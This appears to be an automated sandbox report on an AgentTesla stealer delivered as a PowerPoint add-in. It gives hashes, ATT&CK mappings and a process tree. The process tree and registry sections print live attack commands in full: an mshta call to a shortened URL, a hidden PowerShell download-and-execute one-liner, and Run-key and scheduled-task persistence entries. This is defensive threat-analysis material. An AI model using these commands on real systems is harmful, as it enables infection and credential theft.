agenttesla | 22da4275847d5be9f1d21df99c3f51be09d31be7942940732d311b030c62eeb0

General

Target

1.ppam
Size

11KB
MD5

e5a35f8c565ddea415804d4b05244e28
SHA1

47d030e20b324c3706d652b2a562a61547e14fbd
SHA256

22da4275847d5be9f1d21df99c3f51be09d31be7942940732d311b030c62eeb0
SHA512

022d032f791e30e19a4c82a4e17cacaf238618c0f635bb94e747d7769093da575b2577fe95174d7b747b29909232d69df1a7135d9e3db640de947ce9dc21ffdf

Score

10^/10

agenttesla collection keylogger persistence spyware stealer trojan

Malware Config

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

mshta.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process	5040	3464	mshta.exe	POWERPNT.EXE

AgentTesla Payload 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/3776-324-0x00000000004376DE-mapping.dmp	family_agenttesla
behavioral2/memory/3308-391-0x00000000004376DE-mapping.dmp	family_agenttesla

Blocklisted process makes network request 15 IoCs

Processes:

mshta.exepowershell.exe

flow	pid	process
34	5040	mshta.exe
37	5040	mshta.exe
39	5040	mshta.exe
42	5040	mshta.exe
46	5040	mshta.exe
47	5040	mshta.exe
49	5040	mshta.exe
52	5040	mshta.exe
54	5040	mshta.exe
57	5040	mshta.exe
59	5040	mshta.exe
60	5040	mshta.exe
61	5040	mshta.exe
63	5040	mshta.exe
66	4992	powershell.exe

Drops file in Drivers directory 2 IoCs

Processes:

jsc.exeRegAsm.exe

description	ioc	process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	jsc.exe
File opened for modification	C:\Windows\system32\drivers\etc\hosts	RegAsm.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs

collection

Email Collection

T1114

Processes:

RegAsm.exejsc.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe
Key opened	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe
Key opened	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe
Key opened	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	jsc.exe
Key opened	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	jsc.exe
Key opened	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	jsc.exe

Adds Run key to start application 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

mshta.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run	mshta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\SAFEsounkkkd = "\"MsHta\"\"http://1230948%[email protected]/p/1.html\""	mshta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\Milalaasdasdlalal = "\"MsHta\"\"http://1230948%[email protected]/p/1.html\""	mshta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\Cleanreasdasdddsults = "\"MsHta\"\"http://1230948%[email protected]/p/1.html\""	mshta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\takeCare = "pOweRshell.exe -w h I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_05220f8387b44631845060f312ebff49.txt').GetResponse().GetResponseStream()).ReadToend());I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_74714f123fd24f07b9b6e592dd9ec191.txt').GetResponse().GetResponseStream()).ReadToend());"	mshta.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

powershell.exe

description	pid	process	target process
PID 4992 set thread context of 3776	4992	powershell.exe	jsc.exe
PID 4992 set thread context of 3308	4992	powershell.exe	RegAsm.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 5 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

POWERPNT.EXEmshta.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	POWERPNT.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	mshta.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	mshta.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	POWERPNT.EXE

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

4132 schtasks.exe

pid	process
4132	schtasks.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

POWERPNT.EXE

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	POWERPNT.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	POWERPNT.EXE

Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

1508 taskkill.exe
4184 taskkill.exe
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

POWERPNT.EXE

pid process

3464 POWERPNT.EXE
Suspicious behavior: EnumeratesProcesses 9 IoCs

Processes:

dw20.exepowershell.exejsc.exeRegAsm.exe

pid process

2224 dw20.exe
2224 dw20.exe
4992 powershell.exe
4992 powershell.exe
4992 powershell.exe
3776 jsc.exe
3776 jsc.exe
3308 RegAsm.exe
3308 RegAsm.exe
Suspicious behavior: SetClipboardViewer 1 IoCs

Processes:

RegAsm.exe

pid process

3308 RegAsm.exe

pid	process
1508	taskkill.exe
4184	taskkill.exe

pid	process
3464	POWERPNT.EXE

pid	process
2224	dw20.exe
2224	dw20.exe
4992	powershell.exe
4992	powershell.exe
4992	powershell.exe
3776	jsc.exe
3776	jsc.exe
3308	RegAsm.exe
3308	RegAsm.exe

pid	process
3308	RegAsm.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

taskkill.exetaskkill.exepowershell.exejsc.exeRegAsm.exe

description	pid	process
Token: SeDebugPrivilege	1508	taskkill.exe
Token: SeDebugPrivilege	4184	taskkill.exe
Token: SeDebugPrivilege	4992	powershell.exe
Token: SeDebugPrivilege	3776	jsc.exe
Token: SeDebugPrivilege	3308	RegAsm.exe

Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

POWERPNT.EXEmshta.exejsc.exeRegAsm.exe

pid process

3464 POWERPNT.EXE
5040 mshta.exe
3776 jsc.exe
3308 RegAsm.exe

pid	process
3464	POWERPNT.EXE
5040	mshta.exe
3776	jsc.exe
3308	RegAsm.exe

Suspicious use of WriteProcessMemory 32 IoCs

Processes:

POWERPNT.EXEmshta.exepowershell.execsc.exe

description	pid	process	target process
PID 3464 wrote to memory of 5040	3464	POWERPNT.EXE	mshta.exe
PID 3464 wrote to memory of 5040	3464	POWERPNT.EXE	mshta.exe
PID 5040 wrote to memory of 1508	5040	mshta.exe	taskkill.exe
PID 5040 wrote to memory of 1508	5040	mshta.exe	taskkill.exe
PID 5040 wrote to memory of 4184	5040	mshta.exe	taskkill.exe
PID 5040 wrote to memory of 4184	5040	mshta.exe	taskkill.exe
PID 5040 wrote to memory of 4992	5040	mshta.exe	powershell.exe
PID 5040 wrote to memory of 4992	5040	mshta.exe	powershell.exe
PID 5040 wrote to memory of 4132	5040	mshta.exe	schtasks.exe
PID 5040 wrote to memory of 4132	5040	mshta.exe	schtasks.exe
PID 5040 wrote to memory of 2224	5040	mshta.exe	dw20.exe
PID 5040 wrote to memory of 2224	5040	mshta.exe	dw20.exe
PID 4992 wrote to memory of 3776	4992	powershell.exe	jsc.exe
PID 4992 wrote to memory of 3776	4992	powershell.exe	jsc.exe
PID 4992 wrote to memory of 3776	4992	powershell.exe	jsc.exe
PID 4992 wrote to memory of 3776	4992	powershell.exe	jsc.exe
PID 4992 wrote to memory of 3776	4992	powershell.exe	jsc.exe
PID 4992 wrote to memory of 3776	4992	powershell.exe	jsc.exe
PID 4992 wrote to memory of 3776	4992	powershell.exe	jsc.exe
PID 4992 wrote to memory of 3776	4992	powershell.exe	jsc.exe
PID 4992 wrote to memory of 4548	4992	powershell.exe	csc.exe
PID 4992 wrote to memory of 4548	4992	powershell.exe	csc.exe
PID 4548 wrote to memory of 2796	4548	csc.exe	cvtres.exe
PID 4548 wrote to memory of 2796	4548	csc.exe	cvtres.exe
PID 4992 wrote to memory of 3308	4992	powershell.exe	RegAsm.exe
PID 4992 wrote to memory of 3308	4992	powershell.exe	RegAsm.exe
PID 4992 wrote to memory of 3308	4992	powershell.exe	RegAsm.exe
PID 4992 wrote to memory of 3308	4992	powershell.exe	RegAsm.exe
PID 4992 wrote to memory of 3308	4992	powershell.exe	RegAsm.exe
PID 4992 wrote to memory of 3308	4992	powershell.exe	RegAsm.exe
PID 4992 wrote to memory of 3308	4992	powershell.exe	RegAsm.exe
PID 4992 wrote to memory of 3308	4992	powershell.exe	RegAsm.exe

outlook_office_path 1 IoCs

Processes:

RegAsm.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe

outlook_win_path 1 IoCs

Processes:

RegAsm.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe

C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE
"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\1.ppam" /ou ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3464

C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" http://www.bitly.com/doaksodksueasdweu
2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Adds Run key to start application
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:5040

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im winword.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1508

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im Excel.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4184

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""Bluefibonashi"" /F /tr ""\""MsHtA""\""http://1230948%[email protected]/p/1.html\""
3⤵
- Creates scheduled task(s)
PID:4132

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_05220f8387b44631845060f312ebff49.txt').GetResponse().GetResponseStream()).ReadToend());I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_74714f123fd24f07b9b6e592dd9ec191.txt').GetResponse().GetResponseStream()).ReadToend());
3⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4992

C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
4⤵
- Drops file in Drivers directory
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3776

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\kyc2wkm5\kyc2wkm5.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:4548

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF00.tmp" "c:\Users\Admin\AppData\Local\Temp\kyc2wkm5\CSC48B99235E1A14025AC3F54BABEF723BC.TMP"
5⤵
PID:2796

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
4⤵
- Drops file in Drivers directory
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: SetClipboardViewer
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- outlook_office_path
- outlook_win_path
PID:3308

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
dw20.exe -x -s 2696
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2224

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Registry Run Keys / Startup Folder

1

T1060

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Modify Registry

1

T1112

Credential Access

Credentials in Files

3

T1081

Discovery

System Information Discovery

3

T1082

Query Registry

2

T1012

Lateral Movement

Collection

Data from Local System

3

T1005

Email Collection

1

T1114

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESF00.tmp
MD5
f2a2d79cbf31e342efa391b1ce01baa2

SHA1
d80642fbedcb6b1e8b5877c79575e31406795ec6

SHA256
95c9fd54100fc250f824e21b18645e6c84a0a643529b7742d817315645e9fbfa

SHA512
5943f701b07a8daf9798004ffe124bf514bfad00c678b5b7c124d2203f7228bf10ce9cd9ee9309f88b568f643b4c02665d58de5496e63506e6c3cd534a1fe6b4

Download Submit
C:\Users\Admin\AppData\Local\Temp\kyc2wkm5\kyc2wkm5.dll
MD5
004a2a30c28121d4cc0a26952edde51d

SHA1
7b23b07ae09ae5f7625c33025e50a4f507d8383d

SHA256
05b757cb056ee8ba48b2f70ec08bca1c912b5816723faa977e14a49e7eaa69ff

SHA512
d2773635fe8c42d016c4dbd178e305dc692e78e3487e73de56702bcb4e2489bf427f7a7775b9b68ef228706bbf4156636984b0f13aefa212459768869bdf0aff

Download Submit
C:\Windows\system32\drivers\etc\hosts
MD5
5b2d17233558878a82ee464d04f58b59

SHA1
47ebffcad0b4c358df0d6a06ef335cb6aab0ab20

SHA256
5b036588bb4cad3de01dd04988af705da135d9f394755080cf9941444c09a542

SHA512
d2aec9779eb8803514213a8e396b2f7c0b4a6f57de1ee84e9db0343ee5ff093e26bb70e0737a6681e21e88898ef5139969ff0b4b700cb6727979bd898fdbc85b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\kyc2wkm5\CSC48B99235E1A14025AC3F54BABEF723BC.TMP
MD5
d8c9afdbf35ccbf33eba86ef205f5bdb

SHA1
8bcac41ee1298bf9239fb9d8077709ad26558b37

SHA256
e2ab03b4cd65ff8a75a34c1a84278c0bb185fa649ab0c990bfb14e182b3bd7f6

SHA512
80b1339a542ec3d77e6734fb0b4d7d9363235e98e42ecd3c4d619cf08ac3a57039ac653a3ec7dcd3b902cabe6ef9210a0eabd729776e2d99ec07ce72cd13f222

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\kyc2wkm5\kyc2wkm5.0.cs
MD5
e03b1e7ba7f1a53a7e10c0fd9049f437

SHA1
3bb851a42717eeb588eb7deadfcd04c571c15f41

SHA256
3ca2d456cf2f8d781f2134e1481bd787a9cb6f4bcaa2131ebbe0d47a0eb36427

SHA512
a098a8e2a60a75357ee202ed4bbe6b86fa7b2ebae30574791e0d13dcf3ee95b841a14b51553c23b95af32a29cc2265afc285b3b0442f0454ea730de4d647383f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\kyc2wkm5\kyc2wkm5.cmdline
MD5
536be0aaebd71dca2fed0e3abee76943

SHA1
54752089231ec3daf436e42538f28987e43a213b

SHA256
d6d0af0e7cce2bfe40ca6e7ddd95413f9efa9c152861bf513e34a34f51cd69d8

SHA512
519b822398cb50b5b50041040dbc93d3488a1026c71dd4e9c6512faf71a85cfbe7f0771f55b383ef23a7d906b36783a79a8441cb106aaf7bdd4b952e4d382dac

Download Submit
memory/1508-291-0x0000000000000000-mapping.dmp

Download
memory/2224-300-0x0000000000000000-mapping.dmp

Download
memory/2796-385-0x0000000000000000-mapping.dmp

Download
memory/3308-408-0x0000000004E51000-0x0000000004E52000-memory.dmp

Filesize
4KB

Download
memory/3308-397-0x0000000004E50000-0x0000000004E51000-memory.dmp

Filesize
4KB

Download
memory/3308-391-0x00000000004376DE-mapping.dmp

Download
memory/3464-128-0x00007FFD757C0000-0x00007FFD757D0000-memory.dmp

Filesize
64KB

Download
memory/3464-119-0x00007FFD783B0000-0x00007FFD783C0000-memory.dmp

Filesize
64KB

Download
memory/3464-116-0x00007FFD783B0000-0x00007FFD783C0000-memory.dmp

Filesize
64KB

Download
memory/3464-117-0x00007FFD783B0000-0x00007FFD783C0000-memory.dmp

Filesize
64KB

Download
memory/3464-118-0x00007FFD783B0000-0x00007FFD783C0000-memory.dmp

Filesize
64KB

Download
memory/3464-121-0x000001EE71060000-0x000001EE71062000-memory.dmp

Filesize
8KB

Download
memory/3464-120-0x000001EE71060000-0x000001EE71062000-memory.dmp

Filesize
8KB

Download
memory/3464-122-0x000001EE71060000-0x000001EE71062000-memory.dmp

Filesize
8KB

Download
memory/3464-115-0x00007FFD783B0000-0x00007FFD783C0000-memory.dmp

Filesize
64KB

Download
memory/3464-129-0x00007FFD757C0000-0x00007FFD757D0000-memory.dmp

Filesize
64KB

Download
memory/3776-379-0x0000000005270000-0x0000000005271000-memory.dmp

Filesize
4KB

Download
memory/3776-324-0x00000000004376DE-mapping.dmp

Download
memory/3776-406-0x0000000005271000-0x0000000005272000-memory.dmp

Filesize
4KB

Download
memory/4132-299-0x0000000000000000-mapping.dmp

Download
memory/4184-292-0x0000000000000000-mapping.dmp

Download
memory/4548-382-0x0000000000000000-mapping.dmp

Download
memory/4992-321-0x0000027649716000-0x0000027649718000-memory.dmp

Filesize
8KB

Download
memory/4992-316-0x0000027649713000-0x0000027649715000-memory.dmp

Filesize
8KB

Download
memory/4992-315-0x0000027649710000-0x0000027649712000-memory.dmp

Filesize
8KB

Download
memory/4992-298-0x0000000000000000-mapping.dmp

Download
memory/5040-264-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads